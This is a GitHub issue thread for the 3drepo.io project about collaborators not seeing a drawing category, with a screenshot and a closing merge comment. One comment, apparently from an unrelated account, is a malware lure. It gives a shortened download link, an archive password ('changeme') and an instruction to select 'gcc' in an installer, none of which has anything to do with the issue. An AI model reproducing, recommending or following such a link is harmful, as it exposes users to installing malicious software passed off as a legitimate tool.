### ISSUE TITLE
[2D MVP] Milestone 1:  Collaborators should be able to see drawing category

### ISSUE THREAD

**Issue by sanmont3drepo** [3drepo/3drepo.io#5129]
### Description
Product issue:  https://github.com/3drepo/3D-Repo-Product-Team/issues/377.

- [ ] Collaborator cannot see the drawing category:

![24-08-27 11-51-41](https://github.com/user-attachments/assets/885f611c-0fa0-487f-a765-57d4b3960fe1)

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by sanmont3drepo** [comment]
Merged into base branch
